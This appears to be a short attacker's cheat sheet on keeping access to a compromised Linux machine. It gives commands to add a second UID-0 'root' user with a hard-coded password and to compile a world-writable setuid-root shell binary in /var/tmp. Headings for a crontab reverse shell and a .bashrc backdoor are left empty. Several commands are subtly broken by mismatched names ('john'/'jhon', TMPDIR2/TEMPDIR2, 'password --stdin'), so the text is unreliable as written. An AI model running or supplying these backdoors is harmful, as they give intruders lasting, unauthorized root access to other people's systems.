Persistance

# Create root user
```
sudo adduser -ou 0 -g 0 john
sudo passwd jhon
echo "linuxpassword" | password --stdin john
```

# Suid bin
```
TMPDIR2="/var/tmp"
echo 'int main(void){setresuid(0, 0, 0); system("/bin/sh");}' > $TEMPDIR2/croissant.c
gcc $TEMPDIR2/croissant.c -o $TEMPDIR2/croissant 2>/dev/null
rm $TEMPDIR2/croissant.c
chown root:root $$TEMPDIR2/croissant
chmod 4777 $TEMPDIR2/croissant
```

# Crontab reverse shell


# backtoor target .bashrc
